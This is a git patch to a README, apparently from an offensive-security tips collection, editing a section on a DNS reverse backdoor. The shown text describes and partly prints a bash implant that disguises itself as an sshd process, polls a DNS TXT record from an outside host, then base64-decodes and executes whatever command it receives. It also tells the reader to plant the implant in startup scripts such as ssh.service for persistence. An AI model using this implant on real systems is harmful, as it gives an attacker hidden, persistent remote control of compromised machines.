From f5c1b74f7f9eb85a4ad9fe90248dd24763c1ff1b Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 6 May 2025 14:15:43 +0100
Subject: [PATCH] Update README.md

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 11ca032..9a6b868 100644
--- a/README.md
+++ b/README.md
@@ -1873,9 +1873,9 @@ An elaborate DNS reverse backdoor (as a daemon and living-off-the-land):
 - Depends on bash, dig and base64 only.
 - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups`
 - Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net).
-- Base64-decodes the TXT record and executes the command on the target.
+- Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m).
 
-1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. 
+1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant.
 
 ```shell
 base64 -w0 >x.txt <<-'EOF'
@@ -1892,6 +1892,7 @@ while :; do
 done'|exec -a "$P" bash &) &>/dev/null
 EOF
 echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $(<x.txt)|base64 -d|bash"$'\033[0m'
+rm -f x.txt
 ```
 
 2. Add this 1-line implant to any startup script on the target (e.g. to [udev](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp) or `ExecStartPre=` in */usr/lib/systemd/system/ssh.service*). An clever example for ssh.service: